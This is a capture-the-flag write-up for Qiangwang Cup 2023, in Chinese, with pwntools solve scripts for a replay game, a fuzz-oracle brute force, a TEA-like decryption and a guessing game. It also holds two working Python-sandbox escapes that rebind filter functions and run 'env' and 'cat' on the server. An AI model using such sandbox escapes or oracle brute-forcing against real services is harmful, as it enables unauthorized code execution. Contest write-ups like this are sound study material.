强网杯2023WP

因为周末太冷了,所以决定随便打打qwb摸摸鱼,太卷了现在的qwb,被暴打

强网先锋

石头剪刀布

from pwn import *

def read_data():
    """Return the next line from the global pwntools tube ``io`` as text.

    The bytes returned by ``io.recvline()`` are decoded as UTF-8 and handed
    back without any stripping.
    """
    return io.recvline().decode('utf-8')

def read_once():
    """Print the next five lines received from the server."""
    for _ in range(5):
        line = read_data()
        print(line)

def begin(i):
    """Consume ``i`` groups of server output, five lines each, via ``read_once``."""
    for _ in range(i):
        read_once()

def send_data():
    """Replay every move stored in the global ``data`` string, then drain the replies.

    Each character of ``data`` is sent on its own line over the global tube
    ``io``. Afterwards four lines are read and printed, followed by one
    five-line group per replayed move (``begin(len(data))``).
    """
    for move in data:
        io.sendline(move.encode())

    # Four lines are echoed before the per-move output; presumably the
    # service banner -- confirm against the live service.
    for _ in range(4):
        print(read_data())

    begin(len(data))
    
def right():
    """Return True when the third line of the server's reply contains "你".

    The first two lines are read and discarded. Presumably that character
    only appears in the service's "you win" message -- not visible here.
    """
    io.recvline()
    io.recvline()
    verdict = io.recvline().decode('utf-8')
    return "你" in verdict

def try_ans(ans):
    """Replay the known moves, submit ``ans`` as the next one and report the outcome.

    Returns ``ans`` unchanged when ``right()`` reports success, otherwise
    ``None``.
    """
    send_data()
    io.sendline(ans.encode())
    return ans if right() else None
    
# Moves confirmed so far. Every guess that ``try_ans`` verifies is appended,
# so the replayed prefix grows by one move at a time.
# NOTE(review): this only works if the opponent's sequence is identical on
# every connection -- presumably that fixed sequence is the challenge's
# weakness; a per-session random sequence would defeat the replay.
data="001122012"
for _attempt in range(90):
    for guess in map(str, range(3)):
        # A fresh connection per guess: the known prefix is replayed from
        # the start each time.
        io = remote( '8.147.135.248' ,25407)

        confirmed = try_ans(guess)
        if confirmed:
            data+=confirmed
        io.close()
    print(data)

easy_fuzz

一个简单的fuzz:程序会对我们输入的字符串进行匹配,并以覆盖率的形式返回结果。覆盖率的前两位只检查我们的输入是否是9位,这两个位置随便什么字符都可以。后面7个字符逐个对比,如果比对正确,对应的覆盖率位就为1,不正确就为0。由于每一位的比对结果都会单独返回,可以逐字符枚举。fuzz的脚本如下:

from pwn import *

# Tube to the challenge service (host and port as given in the writeup).
p = remote("101.200.122.251",12177)

# Candidate bytes: one single-byte string per printable ASCII code 32..126.
charset = [bytes(chr(code), 'utf-8') for code in range(32, 127)]

# Nine-byte probe, one list slot per position so a single position can be
# swapped without rebuilding the whole string.
payload = [b'a'] * 9

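def get_string(payload):
    """Concatenate the byte strings in ``payload`` into one ``bytes`` value.

    Args:
        payload: iterable of ``bytes`` fragments, one per input position.

    Returns:
        The fragments joined in order; ``b''`` for an empty iterable.
    """
    # bytes.join builds the result in one pass instead of re-allocating the
    # accumulator on every ``+=``.
    return b''.join(payload)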

# Recover the expected input one position at a time. The service answers each
# probe with a line whose last nine characters are per-position match bits
# (see the description above), which is what makes a position-by-position
# search possible; returning only an overall pass/fail would remove that signal.
for pos in range(9):
    for candidate in charset:
        payload[pos] = candidate
        probe = get_string(payload)
        p.sendline(probe)
        content = p.recvline().decode('utf-8').strip()
        content2 = p.recvline()
        # pos - 9 is a negative index: it selects this position's bit
        # within the trailing nine characters of the reply.
        if content[pos - 9] != "1":
            continue
        print(f"payload:{probe} coverage: {content[-9:]}")
        print(content2)
        break

最后得到当字符为 aaqwbGood 时,覆盖率为全1,拿到flag:

qwb{YouKnowHowToFuzz!}

SpeedUp

发现这里有A244060 - OEIS

Babyre

类似于tea的加密模式

#include <stdio.h>

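/* Key material: the four bytes "bomb" followed by zero padding.
 * dec() only ever indexes bytes 0..3 (the index is masked with & 3). */
unsigned char byte_7FF7833FE000[8] = {
    0x62,0x6f,0x6d,0x62, 0x00, 0x00, 0x00, 0x00
};

/*
 * Reverse the TEA-like transform on the two words *a1 and *a2, in place.
 *
 * 4 * 33 = 132 rounds are undone. v3 is the running round constant: it starts
 * 132 steps of 2009038745 below 2421198151 and is advanced by one step before
 * each round, so the last round uses 2421198151 itself.
 *
 * The arithmetic relies on unsigned int being 32 bits wide (wrap-around
 * modulo 2^32).
 *
 * Returns 4, the number of outer passes, which is what the decompiled
 * original ended up returning.
 */
int dec(unsigned  *a1, unsigned *a2)
{
  /* Unsigned literals keep the start value in modulo-2^32 arithmetic; written
     with plain int literals, 2009038745*33*4 overflows int, which is
     undefined behaviour in C. */
  const unsigned int delta = 2009038745u;
  unsigned int v3 = 2421198151u - delta * 33u * 4u;
  int i;
  int j;

  for ( i = 0; i < 4; ++i )
  {
    for ( j = 0; j < 33; ++j )
    {
      v3 += delta;
      /* Second word first, then the first word using the updated second. */
      *a2 -= (((32 * *a1) ^ (*a1 >> 4)) + *a1) ^ (v3 + byte_7FF7833FE000[(v3 >> 11) & 3]);
      *a1 -= (((32 * *a2) ^ (*a2 >> 4)) + *a2) ^ (v3 + byte_7FF7833FE000[v3 & 3]) ^ v3;
    }
  }
  return 4;
}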

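/*
 * Decode the 32-byte blob taken from the binary and print it.
 *
 * Steps: XOR every byte with its own index, run dec() over the four
 * consecutive 8-byte blocks, then print the buffer as a string.
 */
int main(int argc, char const *argv[])
{
    /* 32 data bytes plus one extra element that stays zero, so the buffer is
       NUL-terminated when it is handed to puts(). */
    unsigned char byte_7FF7833FE040[33] = {
    0xE0, 0xF3, 0x21, 0x96, 0x97, 0xC7, 0xDE, 0x89, 0x9B, 0xCA, 0x62, 0x8D, 0xB0, 0x5D, 0xFC, 0xD2, 
    0x89, 0x55, 0x1C, 0x42, 0x50, 0xA8, 0x76, 0x9B, 0xEA, 0xB2, 0xC6, 0x2F, 0x7C, 0xCF, 0x11, 0xDE
};
    /* Only the 32 data bytes are XORed; the terminator is left alone. */
    for (size_t i = 0; i < 32; i++)
    {
        byte_7FF7833FE040[i] ^= i;
    }
    /* NOTE(review): viewing the byte buffer as unsigned int words makes the
       result depend on host byte order and assumes the buffer is suitably
       aligned -- confirm on the target platform. */
    unsigned int *v =(unsigned int *)byte_7FF7833FE040;

    dec(v,v+1);
    dec(v+2,v+3);
    dec(v+4,v+5);
    dec(v+6,v+7);
    /* puts() takes a char pointer; pass the byte buffer rather than the
       unsigned int view. */
    puts((const char *)byte_7FF7833FE040);
    return 0;
}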

Misc

Pyjail ! It’s myFILTER

from pwn import *

# Tube to the jail service.
io = remote("8.147.133.95", 18270)

# First submission. `(my_filter:=len,1)[1]` is an assignment expression that
# rebinds the name my_filter to the builtin len and evaluates to 1. In
# f-string syntax `{{`/`}}` are literal braces and `{chr(0x74)}` yields "t",
# so one round of formatting turns the tail into `{input()}`.
# NOTE(review): presumably the service evaluates the submission as an
# f-string in a namespace where my_filter lives -- the server code is not
# shown here. If so, the root cause is that the filter is looked up by a name
# the evaluated code can rebind.
first_stage = b"{(my_filter:=len,1)[1]}{{inpu{chr(0x74)}()}}"
io.sendlineafter(b"code to escape >", first_stage)

# Second submission: goes from list to its base class and calls the last
# entry of __subclasses__() with "env". Which class that is depends on the
# server's interpreter state -- not visible from this script.
second_stage = b"{print([].__class__.__base__.__subclasses__()[-1](\"env\"))}".strip()
io.sendline(second_stage)

io.interactive()

Pyjail ! It’s myReveng

from pwn import *

# Tube to the second jail service.
io = remote("8.147.131.244", 17143)

# First submission: the tuple of assignment expressions rebinds my_filter to
# the builtin len and len to the builtin any, then evaluates to 1 (index 2).
# The tail becomes `{input()}` after one round of f-string formatting.
# NOTE(review): presumably the service's checks call my_filter and len by
# name, so rebinding both neutralises them -- server code not shown here.
first_stage = b"{(my_filter:=len,len:=any,1)[2]}{{inpu{chr(0x74)}()}}"
io.sendlineafter(b"code to escape >", first_stage)

# Second submission: calls the last entry of object's __subclasses__() with an
# argv-style list and then .communicate(); that usage looks like a
# subprocess.Popen-style class, but the class itself is not visible here.
second_stage = b"{print([].__class__.__base__.__subclasses__()[-1]([\"cat\",\"flag_23A818A72E88A6EE12E8A871F11264F71910B99F5EA05250C145216A8027EFB2\"]).communicate())}".strip()
io.sendline(second_stage)
io.interactive()

Crypto

guess game

盲猜是非预期解,嗯,爆破出来了

from pwn import *

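# NOTE(review): the token is a credential hard-coded in a published script;
# redact or rotate such values before sharing.
token = b"icq19cc72e474f97c53e778965b90d14"
attempt = 0  # connections made so far (renamed from `round`, which shadowed the builtin)
maxnum = 0   # best single-attempt win count seen so far
win = 0      # wins in the current attempt

while True:
    # Reset per connection: the status line reports wins for this attempt,
    # and without the reset the threshold below would compare a total
    # accumulated across all attempts.
    win = 0
    try:
        io = remote("47.97.69.130", 22333)
        attempt += 1
        io.sendlineafter(b"token:", token)
        io.sendlineafter(b">", b"2")

        # 80 guesses per game, always answering "0".
        for _ in range(80):
            io.sendlineafter(b">", b"0")
            res = io.recvuntil(b"!")
            if b"Right" in res:
                win += 1
            maxnum = max(win, maxnum)
        print(f"第{attempt}次尝试, 赢了{win}次,目前最多{maxnum}次")
        if win > 56:
            print("ooooooooooook")
            # Leave the tube open so the interactive session below can use it.
            break
        io.close()
    except EOFError:
        # The service dropped the connection mid-game; start a new attempt.
        io.close()
        continue

io.interactive()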